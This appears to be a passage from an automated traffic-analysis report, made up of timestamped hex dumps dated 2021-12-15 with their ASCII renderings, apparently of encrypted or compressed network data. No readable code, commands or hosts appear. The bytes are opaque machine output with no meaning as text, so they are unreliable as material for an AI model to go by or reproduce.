                Data Ascii: ]gb3*YrS'?k=F\acY\6("pIw8jWSm(&XWYymj8q)MhBIb(8d/hY.0D;6NvMsMRFT=~5Xe{}>D=$F6,Q/mEw{p:MgEh3Yb=HehQQctx_Z4
                2021-12-15 13:13:48 UTC75INData Raw: 12 b2 fa 61 0b 4c 50 a1 03 33 c2 ce 08 c1 e2 03 91 df ad 4b e6 db 42 32 40 0b 28 c0 42 64 d5 b7 b0 68 45 e0 62 c1 02 29 2b 0b 9a fd d9 f5 0f 5d cd da 6d 2e 55 3a ae 3a 33 bb e6 1d 62 fa f4 98 d0 ed 23 e1 5d 88 78 2c db 3d 2c 18 57 7a 20 32 a9 4d 5e 42 62 5d e1 60 37 4a ae fe 3f d4 ec fc c8 29 b1 ce f4 e2 e5 bd 11 4f 1a bc a3 ce 69 b9 e0 cc 98 7b 2e b8 ae 13 5c 96 13 e6 79 a2 5e 9c 0f aa 23 da f0 ef ec 2e 3f d7 a7 dd 76 18 2f 52 4c 7a 12 4b 35 b8 f4 c6 51 9b f0 ff 15 a6 87 1e 45 8c 41 ed f9 7e c0 81 0b 24 4e b9 17 b0 43 13 62 00 64 c1 54 28 fa a0 6d b6 3f e3 58 27 70 90 0a fc dc f2 55 45 13 71 b0 bb 18 cb e5 07 3e e5 35 78 2d 14 5d c0 b2 c9 64 22 df 86 98 49 6b c5 04 53 a8 31 34 75 e0 18 f6 d6 18 e2 9e c7 88 f5 98 8b f9 74 26 80 7f 48 df 59 de 99 2a 93 62
                Data Ascii: aLP3KB2@(BdhEb)+]m.U::3b#]x,=,Wz 2M^Bb]`7J?)Oi{.\y^#.?v/RLzK5QEA~$NCbdT(m?X'pUEq>5x-]d"IkS14ut&HY*b
                2021-12-15 13:13:48 UTC76INData Raw: 13 35 ca c7 a7 72 9f 8f 1a 38 9f 32 00 c0 3f ad e2 e3 c5 ac 0b 54 3a af 0c 36 5f 8f 8e b2 f4 63 5c 8f 75 ea d1 41 14 17 44 ff b7 48 7e b3 22 34 cc 1b 40 d1 41 57 d8 4e c1 3d 63 a9 39 d0 72 59 9e 37 dc 52 6f 61 ee 2a 9e 83 d4 57 4c ba de 5b 28 96 46 92 ef 25 03 b6 85 ee 99 63 98 16 44 18 93 8f 65 1c c4 90 6e 32 a3 da 11 52 11 67 8d 6b 6f 8b 34 ed b0 a7 94 5a 54 d4 90 28 98 59 d4 56 7f 7d 52 1f f5 9d f7 e2 05 a7 96 95 93 04 cf a0 e9 fc 45 db 3c c0 ad 9a ae e9 08 6d 87 ce c9 1a c6 b4 ef e0 a1 0a f7 07 39 16 6b f4 c3 81 a2 00 e6 f2 80 45 d5 b3 1e 2b ce 7e 10 18 83 d1 c0 3e 1c fc 62 f7 fd 30 29 d3 b6 e7 ae 18 ed db 53 19 00 e1 5c 92 dc df ad b4 20 c1 61 55 b9 66 26 6d ae f3 ba 75 1f 40 04 50 70 f2 02 03 f1 8d c8 fe 99 a5 b7 4e 7b 60 c6 a0 49 8a c8 80 ce 57 5f
                Data Ascii: 5r82?T:6_c\uADH~"4@AWN=c9rY7Roa*WL[(F%cDen2Rgko4ZT(YV}RE<m9kE+~>b0)S\ aUf&mu@PpN{`IW_
                2021-12-15 13:13:48 UTC77INData Raw: 4f 6a 53 76 58 d8 f8 ee e0 2b 41 43 13 34 44 09 62 12 83 77 13 d7 46 7b dc 39 28 cb 71 91 c9 c9 9e f4 43 ae 4b 4c 61 39 93 3a 9e 42 bf 15 0e de 1d fc 7b e6 b3 48 59 b1 99 d7 3e bf 1a 40 e8 fb 0e 78 6d 07 bc 84 fd 34 68 7b 99 37 c1 5f ef d5 5c 2e a6 77 ba 26 50 de 36 f1 51 59 35 cb b8 03 80 aa 5e ad cb 30 3d 03 5c 62 3c 50 4e cb 48 e7 13 a0 f4 77 19 50 4d 0d 40 93 ec 3b b4 3c 4a ba 0a 85 6e 1c 82 8a d4 60 8a f8 85 83 e3 51 16 bb cc 33 1e c0 b9 78 5e a9 e6 bf 03 b9 65 a1 56 ce 38 d0 0d db 9f 0f 16 77 d9 8e eb 27 8f 40 67 9f 97 cb 41 02 09 71 28 38 93 e7 98 47 34 03 86 84 6f bd 4e 5a 31 86 09 47 cc c3 78 d2 aa f9 c6 bb 1c 25 f3 c4 88 c0 17 07 5b 85 8b 5e 18 84 ce 2a 5d 1b 3b ed 9a fa b8 80 aa c9 97 d8 a9 a9 b0 c5 d4 3c c0 97 01 25 57 0f 72 e1 bf 46 84 c2 6a
                Data Ascii: OjSvX+AC4DbwF{9(qCKLa9:B{HY>@xm4h{7_\.w&P6QY5^0=\b<PNHwPM@;<Jn`Q3x^eV8w'@gAq(8G4oNZ1Gx%[^*];<%WrFj
                2021-12-15 13:13:48 UTC79INData Raw: 5b ce 89 4f 49 e1 da e6 19 e4 68 49 75 0a f5 bf dd 6d 8c a1 65 ec 77 84 fc 02 c8 e2 ee 5d 8e ec 02 d7 19 9b 88 df 49 cb 84 da 4b ca bd 1f 97 a7 24 ad 07 65 6e a8 bf a2 c5 d1 a5 3a d8 6c 26 f4 58 47 c8 7c f4 d0 22 f2 50 51 57 3a cb 4a a8 a8 83 ed ea 20 03 7f db 34 2f 8e f1 cc 38 cb 31 56 42 62 64 b1 ba 18 a5 73 ea 46 9e 60 ac 0e e7 a7 ca 16 a1 98 d7 11 4f 02 a4 9b 95 d0 3f 68 45 98 f6 e8 6d f7 76 fc 88 41 6b 81 28 0c 7e 27 dd b6 25 78 d7 6e 6c 2b 58 58 d2 a5 9e c6 1c dc f9 a9 98 d6 60 7a c6 5e 94 b9 fa 1f a6 ef e2 5d dd e6 8f f3 14 c0 bc 5d 41 05 73 47 e1 c3 7c 11 ba 44 26 01 92 79 33 7b 6d 92 a5 3e dc 69 93 ca 17 59 15 ee e3 71 7b da bb c2 d8 94 12 45 48 c9 0b 2d 7e 35 45 93 43 dd b8 8e 67 d0 06 57 4c cc e2 a8 b6 d2 a4 65 5b 3d 02 23 14 f5 32 f3 d2 64 6a
                Data Ascii: [OIhIumew]IK$en:l&XG|"PQW:J 4/81VBbdsF`O?hEmvAk(~'%xnl+XX`z^]]AsG|D&y3{m>iYq{EH-~5ECgWLe[=#2dj
                2021-12-15 13:13:48 UTC80INData Raw: e9 bd 07 0a 05 19 26 44 6d 27 a0 60 1f 92 7d 25 1c c2 e3 15 d8 f2 af 05 77 08 29 b6 d5 8f 07 94 ba 5d 53 b8 e6 c3 c9 f3 5a a2 62 8f 3d e4 e4 4a 67 5c 5b 60 0d e6 56 e8 47 c4 34 61 79 ac 06 7c e2 eb dc dc 63 aa 45 50 e4 ff 1b d0 ae 37 d6 ab 0c 0c b7 71 19 57 59 da 69 a3 cc 64 82 f7 3b 58 9a 55 4b 01 2b 93 a3 e4 7f ca 5c 5d 10 d6 2e 03 fd fb bc 96 32 6e 53 3e 9e cb 74 b5 64 0e 5f bd c0 dc e2 03 97 b7 91 1c a1 8e e5 d4 54 8d 1c 64 c9 93 14 da ac 0e aa e4 76 d6 d0 46 b6 7d 13 8b be 12 2b cf 92 c8 e3 81 b5 62 78 84 2b 0c de 8f a3 e4 22 a2 8e 00 d4 63 00 cf 8b d6 34 ec c8 70 c8 e6 9f cc 92 9b f6 64 f7 45 66 dd 3e 68 de 26 cd 05 3d 5d c5 35 5f f7 b0 c9 cd b1 66 e7 a4 84 f1 59 6c d9 7f 3a 2f ae 54 d6 66 e1 73 91 64 e7 d2 40 97 62 9c a2 fa ef 54 32 53 0e 1a ce 39
                Data Ascii: &Dm'`}%w)]SZb=Jg\[`VG4ay|cEP7qWYid;XUK+\].2nS>td_TdvF}+bx+"c4pdEf>h&=]5_fYl:/Tfsd@bT2S9
                2021-12-15 13:13:49 UTC129INData Raw: c9 25 12 09 d5 64 8d fd 7a ec 49 33 03 20 85 c5 79 f6 86 4a a3 e9 f9 9c 41 30 77 b7 09 86 82 2f e8 e4 d8 a3 d9 b1 96 9f 65 17 38 d8 a0 53 9c 73 0b ed 96 c9 2f 25 2f 4e df 42 84 21 2b 5b 01 31 8b d1 ef 23 a2 41 7a c3 80 7d 97 63 df a7 db 81 df 0a a0 a3 d9 09 cb d5 6d 3d 66 b4 e7 ad ba 1c be 58 ad e2 2a 8b 90 ea e1 00 8c 62 5f 65 2b cf a9 8f 7c 06 56 8c 18 07 3e 6f 4f 97 fd 73 e1 e8 5e fe a1 c0 0b f6 9c c5 c0 9b cb 3c a1 36 32 b8 54 17 5e ec 11 3a 45 14 9d f8 e2 b9 f8 0b 27 e8 a1 be 9d 81 f1 26 ad 5c fd db 41 7d 27 e5 4a 22 32 3c d7 1f 82 e0 a6 2d be da d9 2a c7 44 f7 96 c6 73 a8 74 e8 46 c2 1a ba e5 74 a4 91 e1 d4 bb 5c f9 ab 62 1c a8 bb b5 0d e5 75 21 e3 ea 7c 3e 89 d0 41 aa 98 fe bc da 8a 75 41 e1 87 a1 55 55 23 8d 26 d0 be 9a ea 00 34 67 3b 0e a4 89 ca
                Data Ascii: %dzI3 yJA0w/e8Ss/%/NB!+[1#Az}cm=fX*b_e+|V>oOs^<62T^:E'&\A}'J"2<-*DstFt\bu!|>AuAUU#&4g;
                2021-12-15 13:13:49 UTC130INData Raw: 25 e8 4b a5 06 2b c1 63 05 03 37 a2 78 ba 27 79 a1 a5 48 18 8b 9a 0a 79 1f 31 51 ff 67 26 93 df 86 fe e9 08 a7 68 62 4e 49 1c b7 be 70 1a 9c b3 dd 93 8b 9a d8 a6 58 63 f5 e3 38 e2 eb 50 f7 77 a6 19 96 79 ce 19 39 b6 a5 6a de f6 96 24 af 5d bb ec 5e 24 dc a6 a6 8c 2d dc 59 05 29 13 65 d7 42 bb 54 4a 76 a3 c6 5b 17 a4 1c b9 47 01 29 c0 49 dd 23 7e 5a 6c 07 fa 83 2f 80 3b c1 35 6a e6 48 89 04 72 c8 5d 58 ca e0 87 77 bd 46 ff e6 6e b2 fa 64 ca e5 4e 11 ab 47 7d f8 d7 c1 d6 86 68 4a b2 dc c5 9b af 5e 5e dc e9 1a 66 0f 5b a0 e7 1b eb 45 cd 33 cb 94 9b 53 7b b8 50 56 fc 1b 5b 72 a8 2b 40 74 ce 21 45 9b 4c 9a ea 1c 72 39 60 e8 c6 cf 6f 5d d3 de 1c ad ac 2d d2 eb 4e 35 96 fb 12 d7 76 cf 6b 62 46 96 49 44 10 98 98 d8 93 86 9a 2f b5 55 9b 53 da 2e c4 72 35 e2 1c 3e
                Data Ascii: %K+c7x'yHy1Qg&hbNIpXc8Pwy9j$]^$-Y)eBTJv[G)I#~Zl/;5jHr]XwFndNG}hJ^^f[E3S{PV[r+@t!ELr9`o]-N5vkbFID/US.r5>
                2021-12-15 13:13:49 UTC131INData Raw: 33 cd e9 c6 86 97 71 cb e6 11 64 5d c9 35 17 86 1c 13 3a c1 b1 56 c2 96 d7 0d e1 15 99 6d 9d 39 af e5 dd e6 4b 1d bb d3 1c 59 df ac 33 11 49 d8 f2 9e 63 4a 00 2d 16 87 02 c5 7e c7 6c fc 6b a3 1b 6a ae 22 f5 b6 f4 76 fd 30 de bb 64 10 4b 93 7a a5 bb a8 82 cd a7 07 05 83 f3 7f fc 67 71 51 3d d6 09 29 90 cb 66 6a 9d ac 4d 57 0e cb 7e db 30 e0 05 e8 97 a4 ee 8e b3 b4 36 51 0d 47 50 3f f3 92 85 4b 60 0b 03 34 fa 09 ed e8 7d 44 98 8d 90 5c d8 29 e8 29 0e ef a6 ca b4 5a a6 a7 7e 2d da cb 2e 26 e1 ae 91 b4 94 80 34 ae 60 9a 6f 78 3d 11 07 bb 69 db b1 e3 e4 5e ee e4 5e 3c 22 c3 d0 53 e0 47 c5 1f c7 26 39 db e9 5b ae 41 4c 4e 4b 4e 0b 62 44 de 66 38 22 0b 91 b8 d2 55 56 5e 61 3b 5d 2c 55 e2 9d 19 37 5f 07 0d 66 49 40 8a d5 2f 6e d9 1d f9 44 ca 85 f4 00 5b 42 a6 ac
                Data Ascii: 3qd]5:Vm9KY3IcJ-~lkj"v0dKzgqQ=)fjMW~06QGP?K`4}D\))Z~-.&4`ox=i^^<"SG&9[ALNKNbDf8"UV^a;],U7_fI@/nD[B
                2021-12-15 13:13:49 UTC133INData Raw: 94 70 3e 69 92 cf b5 0a 56 7d 6a 8e 73 ed c3 e0 fc d8 7f 7d e7 93 34 c4 40 22 3d bd f1 ff 70 94 79 af ba 5a 10 3e 37 5b d7 07 54 47 f4 90 e7 19 22 6c 8b 7a 8d 75 7e 66 ce 44 62 dc e9 2c d4 21 a9 5e 31 53 20 ca ed 7d cb 6f 43 1f e3 fa cf 42 38 6a 6d 4d cf 0d b4 38 a0 3c 02 ac 7a 70 a4 5c 65 df bf b2 59 64 ef c1 b7 f2 27 6e c4 42 25 39 b3 17 42 d4 9a e5 6b 01 43 47 c2 67 f3 17 8b 79 57 6d 5e 1d 8b 19 88 f6 db 62 d5 1e ab 87 a9 f6 0f 47 73 cd e1 46 0e ab ca c9 c4 4a da 84 8a bb 72 2f f6 f6 2c 02 67 6d 17 8a f7 69 fa 59 50 29 30 94 0b 2f 24 c0 c6 56 7f 57 61 f8 4d ee 70 ca 05 a1 cd 0e 1f f1 dc d1 e6 2d 3a be 7f 16 41 05 de b0 a5 76 2c ad 86 df 40 68 6c ce 39 d2 96 9e 3b 0a 95 78 d1 29 60 17 ab 63 37 ab 54 34 92 0a b8 6c d5 17 d0 2e b9 dd 40 00 4c 76 e1 6a 0a
                Data Ascii: p>iV}js}4@"=pyZ>7[TG"lzu~fDb,!^1S }oCB8jmM8<zp\eYd'nB%9BkCGgyWm^bGsFJr/,gmiYP)0/$VWaMp-:Av,@hl9;x)`c7T4l.@Lvj
                2021-12-15 13:13:49 UTC134INData Raw: 46 3d d7 d7 82 13 8b 6f 1c c4 2c 4b 98 18 26 68 05 2c af 9c 4b 36 f1 6d b5 ff 6d 05 64 f0 6e ea ee 81 b6 b1 a8 b3 ab 4f 25 9c 29 2f 63 ee 5f dc 9c 9a c8 95 52 06 71 da 2b 4c 72 7e d1 0e f0 03 a0 27 90 89 da 10 fc 81 66 fb 9e cc ed be 68 94 47 41 55 1e ee db 79 ae 38 7c 22 45 81 ba 75 9a e8 90 63 65 05 cb 65 d7 cd c5 a8 2c c5 6b 92 4a 9a 64 d3 8f 3d 1d 3c 17 84 68 2d 64 6e 8f a4 8a 5a 49 e9 4d d6 52 88 64 5f 5e 11 7e b1 05 fb 44 30 bf 77 7c 39 1a 7d 4e ba 36 0d a1 94 64 c2 d6 6c a5 70 db bb 51 2f 93 f1 f1 b1 fe bc 54 0d 28 42 5e 11 da 15 e3 fb bf 13 39 0d d0 04 e7 88 8e 20 24 bf 66 4a 5c df 06 c0 de c0 8e 63 a3 c8 5f 1d a4 7b 28 1b 0e 9e 63 3c 1f 19 9b 1e 73 3d af 8b f1 6c 67 3f c3 e9 04 9b 14 c6 b3 8e de 1c 0a 07 14 f4 cf b9 1e 7c ee 5a 69 ef af 5d 11 92
                Data Ascii: F=o,K&h,K6mmdnO%)/c_Rq+Lr~'fhGAUy8|"Eucee,kJd=<h-dnZIMRd_^~D0w|9}N6dlpQ/T(B^9 $fJ\c_{(c<s=lg?|Zi]
                2021-12-15 13:13:49 UTC135INData Raw: f8 e1 c6 2e 43 43 16 85 11 ab c2 b4 bc 31 e1 7e 2f 4e 88 b1 d7 16 bc 9b 3d 38 6f bb 8e af a6 e6 77 da 59 3c f0 4f cb 24 06 e0 0d 2a 29 24 3d ec f1 9e b2 6d e7 f4 68 5c a3 67 4e 30 38 49 13 57 eb 9c f9 00 c6 0e 94 15 f4 02 53 3e 34 ff 43 55 91 36 95 29 79 21 48 0f fb 33 56 fe 84 86 e2 26 d1 1d e4 3f db 14 94 56 a1 36 33 6a 9b aa 40 1b 0b d5 12 15 b0 88 2b fe a4 44 3c 1a 27 c3 e0 ff c6 18 22 01 2a a8 af f4 0b 03 75 c6 a5 cc 8a 7a 3c 5a ba dc 3b a1 00 9d 82 2b 79 16 5c d7 0a 65 1b 24 d0 93 92 e3 db ae 87 81 fb 6e a5 58 a0 c3 29 64 07 41 80 8f 0f 84 4f 57 f7 50 fc 23 25 19 ad f8 83 d4 1e 3d 96 b4 9e 28 44 27 fc 5b a3 88 bd 35 36 fc 20 9e fd ed 8e 6e 29 9f 7c 73 1b f2 8f d8 f4 d8 84 86 bc 74 4b ab f2 83 18 4b 5c 95 ff 8c fa fa a7 03 57 74 f6 2a 8f 33 d2 12 34
                Data Ascii: .CC1~/N=8owY<O$*)$=mh\gN08IWS>4CU6)y!H3V&?V63j@+D<'"*uz<Z;+y\e$nX)dAOWP#%=(D'[56 n)|stKK\Wt*34
                2021-12-15 13:13:49 UTC136INData Raw: 10 b2 40 30 ad 28 72 f0 db 74 b6 5c cc 58 ff 80 fe 43 d8 d8 3d fe 97 e0 8b 4e 23 43 47 7b fe 58 71 7f 5c 55 c0 26 b7 31 c2 6c 73 2a 02 d8 23 0c 38 22 1d c2 a1 63 eb e6 e7 62 3b 20 0b 61 82 a8 2f db 40 fb 51 71 d2 19 87 36 f0 ee 5e ab 1b 9f 16 2c c3 2c 6e d5 ed a4 d8 89 0f e9 60 84 76 d2 94 a4 ee 2a ad f8 b3 8e eb 89 b0 e9 12 92 68 ab 4c 21 ed 4d bb 4c e0 81 f2 9b 59 14 4f 27 f5 96 f5 37 db a4 88 0c 4a 8f 3a 79 91 c4 86 76 45 4b bd 68 f5 52 c2 62 6f 8e 05 6c 04 5b f9 78 fe a9 e2 42 91 80 27 c0 3c c6 29 21 a3 12 68 bf e3 97 e4 4e 11 29 fd 7d c9 ef 6a 1e e0 6e 04 54 7e 22 0f af f5 6e 45 dd 07 51 ad fe df bd cd 50 0b 96 fc 05 53 bf 86 70 9c 98 a9 62 51 9b ec ad fb 52 5f 5b 9c 9d 07 e8 fd e6 2d 50 20 e7 34 35 bb 52 4b 88 fd 97 c4 de 78 64 10 ad 37 f2 49 ea b3
                Data Ascii: @0(rt\XC=N#CG{Xq\U&1ls*#8"cb; a/@Qq6^,,n`v*hL!MLYO'7J:yvEKhRbol[xB'<)!hN)}jnT~"nEQPSpbQR_[-P 45RKxd7I
                2021-12-15 13:13:49 UTC138INData Raw: 05 60 08 c4 18 8c c5 39 31 2b 22 cf 00 67 96 e5 31 66 dd 5f 48 4d 47 6f 7d 70 5a fd 34 65 cf 0f 78 93 20 41 15 cc 95 17 b4 6e 3d 9f 85 ad d4 9d 26 89 ec 82 79 36 f4 d1 0d 49 3a 40 dd b6 79 97 e2 fc 60 e6 d6 19 42 d8 d4 21 8d f5 51 ba a3 53 99 37 36 25 b3 3e a1 1f 3a 79 11 f8 09 f9 bf 66 d3 66 26 2b ee 4d 48 c6 dc af e0 e7 0f 84 24 59 1d e0 e7 21 84 c6 73 03 aa f3 4c 33 12 a2 3c a9 c6 5b 1f a5 c5 34 ec 65 47 3a 1a db 1a 84 d5 6d 3e 3c 7f e2 53 f8 dd 5a 9b 92 28 96 ca 56 74 9a 6b f3 e3 06 2f f7 18 71 4c bc 9b 8a b0 a6 9e 41 b4 ca 9d 94 3a f4 f6 3b 95 84 42 d8 d2 71 e0 ab 9a ea 89 f2 be a0 6e 6e e8 38 6e 24 fe d3 4b da 9a 68 8d 44 3d cd d0 8b a4 69 9d 6c de 85 1d 46 c3 0e 48 1a 5b b9 7e 4d 73 fd 13 d8 c5 47 e8 99 bd 3c f4 0f e2 d6 f8 4f b0 b6 c3 e1 7d dd ea
                Data Ascii: `91+"g1f_HMGo}pZ4ex An=&y6I:@y`B!QS76%>:yff&+MH$Y!sL3<[4eG:m><SZ(Vtk/qLA:;Bqnn8n$KhD=ilFH[~MsG<O}
                2021-12-15 13:13:49 UTC139INData Raw: b9 52 7a 86 2d ce 98 b9 75 49 4a 0e 68 5c 2f e0 17 32 4d b8 b7 79 7a f5 44 c4 33 e5 ba 1c 91 c6 bc b0 86 2c 1b c0 b6 5b 5c bc 80 f7 3e 60 34 3a f9 4f 0a d2 23 eb b1 83 12 8f a4 10 7f e7 ec 5c 3f 57 55 c6 45 16 41 28 2d 9a 0b 2c 76 4a 86 cb b6 a6 b8 0a 85 76 d3 b2 05 20 fa ea 4d fc 37 c7 ff 9d 03 2f df 62 28 72 fd 24 c1 c2 81 c4 a9 08 ad 4d 04 81 1e e0 86 15 fd 88 4b 52 3f bb 1c bf 44 1b 1f 40 95 d8 9a c0 12 d8 ee 2a 87 c1 ca 1c ef 8f 79 94 76 b9 e9 b7 44 da b5 f1 cd 8c 42 21 48 7b 61 6b e5 56 ef ec 56 a6 26 3b 33 f9 12 92 fb 29 5c ef d7 f5 ee 7b 67 7a a8 28 63 b8 31 11 bb c9 2e 44 81 16 7d 09 80 f1 41 8d 3c fa 99 d8 4e cc 53 37 2f d6 c6 f2 6e 91 49 da c0 12 e3 71 90 8a b8 75 ef 82 50 40 a1 aa 15 7f 67 29 20 11 a2 d2 10 3b 28 74 11 bf c2 67 2e ed 6f bc 99
                Data Ascii: Rz-uIJh\/2MyzD3,[\>`4:O#\?WUEA(-,vJv M7/b(r$MKR?D@*yvDB!H{akVV&;3)\{gz(c1.D}A<NS7/nIquP@g) ;(tg.o
                2021-12-15 13:13:49 UTC140INData Raw: 2f 04 6c 13 72 cd e5 8a 6a 56 bc 7a 64 57 dd 37 17 08 80 b9 07 d7 02 22 06 45 d3 aa 83 48 da ea 52 01 69 06 1d ca 87 77 19 c0 08 6f aa ef dd 47 4a dc ae f3 0f 08 7d f3 eb 9d 3f a7 51 c7 49 f3 41 0a f6 af b7 06 5a d0 ce 48 40 3f 5e 59 e2 c9 b4 64 a1 87 6a ba 8d 45 61 9a f9 d9 64 5a bf 33 d2 9a da 39 72 8d e7 21 90 66 ca 33 77 f3 21 71 4c 61 ec a3 24 4b 68 b2 e0 a5 34 19 ae 04 1f f5 6f aa 31 92 e8 4f a2 a8 3b 41 a4 8e f9 84 f9 54 1d fe fc fa 57 a7 36 a1 8c d8 d0 a3 a0 ac da 21 7e 37 d9 33 ab 17 8f 18 ed 4d 4e e9 5d b8 a9 5f 42 38 b1 5e 9c ae 59 ce ea 47 ff 0b 23 c9 cf 6d 45 1f 8d ce 61 53 bf 64 1a 43 6b 53 65 6c 0c 6f 41 1d 39 fe 06 5b de 26 09 a4 98 bb ea 14 0b 54 66 2b 48 1f 38 4a 41 ba 6d af 3b 04 50 45 13 c4 2c 23 a9 96 08 c5 52 bb f2 81 2b 1a 52 b1 58
                Data Ascii: /lrjVzdW7"EHRiwoGJ}?QIAZH@?^YdjEadZ39r!f3w!qLa$Kh4o1O;ATW6!~73MN]_B8^YG#mEaSdCkSeloA9[&Tf+H8JAm;PE,#R+RX
                2021-12-15 13:13:49 UTC141INData Raw: de 23 bc 69 8c 53 50 ca 29 f0 e6 fc 46 58 2f 9e 6d e3 31 74 f7 3d 20 dc 23 77 39 b1 3c 46 06 ba 33 25 a3 f1 00 7c de 33 f4 d4 9a a6 38 04 86 54 b3 2c 4f f1 f2 8c f8 b9 ee 9b 31 d7 41 8c 22 ba a4 bb 40 92 15 46 fd 80 c5 0f 12 bf 3b 50 a1 f8 db 6b 63 9f 11 88 55 24 58 2d e1 10 7f 27 33 26 fe c7 fe a3 20 14 29 f5 e8 30 46 6b 96 e8 79 0e 76 51 9d 8e 48 a0 33 60 97 0d 49 e0 c6 f7 7f 68 64 1a 24 1e e8 30 ca 89 0c d4 e6 c9 96 f5 c9 44 88 4c 88 37 36 ca 7a 09 1a ab 11 d8 df b0 a4 d0 89 12 0f 10 0b 62 77 9c a2 29 70 fd c2 e1 6f 08 70 85 53 47 50 19 92 51 40 a8 fc ff f2 30 6e 5a eb 11 4a 84 2c ba 27 b8 b4 72 7b 65 04 55 4e e8 57 8e 27 f6 72 c8 f3 5d c2 9e 18 e0 4e 9f ac 8f 4c 86 90 52 d6 87 aa d3 b6 56 b4 6b 72 16 a7 31 6d 8c 73 d0 cf fd 5d 4e d6 38 c9 dc ff 66 99
                Data Ascii: #iSP)FX/m1t= #w9<F3%|38T,O1A"@F;PkcU$X-'3& )0FkyvQH3`Ihd$0DL76zbw)popSGPQ@0nZJ,'r{eUNW'r]NLRVkr1ms]N8f
                2021-12-15 13:13:49 UTC143INData Raw: e0 1a d3 b2 38 04 4a 7c 15 54 bc 6d c8 eb 47 8f 98 6b 22 ec 0c a6 b8 2f 1a a7 c6 7f e3 25 fb e9 93 f2 52 20 02 7a bd 98 2c 68 98 36 92 61 4b ae f8 21 c4 ef 9e a5 65 bf 9c 78 a2 9f f9 6a fb 02 e7 f5 e2 13 20 28 01 4b f4 d4 cf aa c1 9d 94 c1 13 f9 08 ed 9e 5f 32 cd 39 ba d6 ea fc bf 62 ce aa 7b ce d3 11 6b 41 9f 4c fb 6f dc 83 64 4a ec 9c b7 45 34 ce fb 4c 2d f4 4d ed c6 71 ed 39 cd ed b5 76 e8 61 bb c3 57 23 e2 31 19 78 12 4f ca 23 e2 46 ba 52 df ce 5c a4 94 50 f6 9b f2 1a 5e eb ca 28 ad a2 6f 2c d5 34 64 f1 0f fd 9e 69 48 6a 45 6b 43 bd e9 14 2a 53 1b 5e c1 c4 92 a6 2a 7d aa 09 e2 f7 9e 37 a7 8a 9d d7 ee 37 00 db 09 20 86 c4 dc 9e e9 e2 ed f5 0a 3f 8d ab 6e 83 8d 36 d7 16 51 70 df b9 4d 61 38 e0 fd 5a 1d a0 d3 db 0b f3 11 1b 27 61 19 55 5e ab c1 07 01 d7
                Data Ascii: 8J|TmGk"/%R z,h6aK!exj (K_29b{kALodJE4L-Mq9vaW#1xO#FR\P^(o,4diHjEkC*S^*}77 ?n6QpMa8Z'aU^
                2021-12-15 13:13:49 UTC144INData Raw: 16 85 30 a9 51 d0 93 16 6a 27 22 a6 52 5c 11 20 bb d8 0c 4b d3 ca 85 d9 5f 3a 10 a3 02 b6 55 ca 1d 20 78 6c f5 62 72 c0 d9 a9 55 58 a7 36 d4 87 e2 16 ed bd 26 3c ca 1d 58 6e d2 cb c9 26 33 f1 70 97 58 35 0c f2 62 01 03 51 9b a3 05 99 39 3e ff 4b 17 be 58 0c 7f e8 25 a0 13 a1 e3 cd 29 8d 2e a3 ee 7c a6 1f 6b a0 17 09 98 14 a0 b1 03 42 13 f3 df ac f7 44 5c cb bd 2f 48 f8 72 54 02 8d ac dd 1f 99 9c 31 80 eb a7 7a 9a 95 15 ae 5b 23 ef a9 47 89 41 af ff 61 9c ac 57 df f3 8d 0a 7c d1 62 bf bd 9a a0 65 d3 34 26 74 f9 d2 89 13 9b 2b 31 7b e4 be dd 3c c1 97 f8 7b 99 0a 88 06 1c 5c d0 6b d3 91 3a c4 b8 90 14 03 da 74 d6 f9 49 f2 d8 4f 53 87 4f 3f 32 1d 47 5a 4d f3 96 19 ba 69 28 30 51 b1 16 ec 4b 9c 22 a5 d2 b6 99 ea ca 10 b8 c3 58 9d 83 95 7c 44 d1 48 b3 bc 80 bc
                Data Ascii: 0Qj'"R\ K_:U xlbrUX6&<Xn&3pX5bQ9>KX%).|kBD\/HrT1z[#GAaW|be4&t+1{<{\k:tIOSO?2GZMi(0QK"X|DH
                2021-12-15 13:13:49 UTC145INData Raw: 61 59 bb 92 4c 71 c2 fc 17 ea c5 67 7d de a4 9e 0d 6d a5 8d 51 b6 71 6c 3a 5d 42 ba 36 0e 55 be 0d a5 2b c0 1c d8 84 9a 3b 1f 96 2f 33 93 46 03 6e b2 a0 e8 65 26 9a 8d 7f c5 56 ad 5d 3b 55 9b c5 91 6f 80 92 f2 82 71 54 74 33 4b b8 e5 17 fa 3e ea f4 90 64 0a c7 67 91 27 89 e1 f1 28 a6 05 8a ea fa 75 01 e4 b1 ad a8 62 a4 79 80 16 9b d1 51 50 15 28 7c 9f 20 b2 c0 98 d5 5d f2 a3 e8 9e a8 53 e7 3a a6 12 28 e7 98 47 4a 6c a1 52 23 3f e9 72 69 12 70 31 eb e9 4d f9 f1 1a 79 36 c7 cc 2b 1e 47 29 f3 a9 4f ad be 5a 9f 95 20 f7 6f 0a c1 87 d1 47 d9 c9 de 81 11 6d 84 5b 60 ba f9 66 54 83 81 a6 89 be 7c 5e 40 75 13 54 23 af aa 4d b5 1a b4 0e 43 54 7e 46 19 a7 38 4e bd f6 2b 1e 13 ec 03 6f e7 a8 d4 51 90 ed 2e 8c 19 cf 07 b4 9e b0 3f f6 0a 8b 49 a0 0f 69 cb fd 2f 7d b5
                Data Ascii: aYLqg}mQql:]B6U+;/3Fne&V];UoqTt3K>dg'(ubyQP(| ]S:(GJlR#?rip1My6+G)OZ oGm[`fT|^@uT#MCT~F8N+oQ.?Ii/}
                2021-12-15 13:13:49 UTC146INData Raw: f1 6e 03 b9 31 6a a4 e8 e7 b6 5b de 9a c5 ff 34 60 91 67 42 77 b0 bf 0b ff aa 59 00 2a d3 92 69 3c 91 72 51 c6 bb 58 9a 8c e2 ac 41 88 3b ad d1 53 7c ba c6 ef bd 8f d8 40 a8 bf eb 17 87 11 4a 6f b1 02 47 77 ee b1 e8 e1 ee fc 17 c2 ff 1a e7 04 91 36 2b 84 12 ac f7 48 01 5d fa 04 e9 23 1e cc d2 0f f2 31 4d 7c 3e ab c3 ba 63 6d 2a a6 3a 69 8b 33 c8 56 f3 85 40 55 6d 1f a1 d4 a0 a8 0c 0e 97 cd 31 16 4b a7 e9 b5 50 5d f3 48 f9 3a c2 97 47 de 1f d7 64 ae 38 c5 a3 ad 3b 28 e2 c6 ef 80 3b 79 fe 97 5b 0b d0 16 b5 3e d5 37 13 9c e6 32 8b d1 c9 62 ef af ee e5 4d 8d ca 77 18 a5 70 e6 99 8d 37 04 5b 31 98 72 47 8f bc 8c b2 77 f8 b7 9d 31 04 58 bb 96 d7 6a 6f 19 4e d7 75 d3 52 b7 26 66 6b 50 3d 40 74 1c f4 18 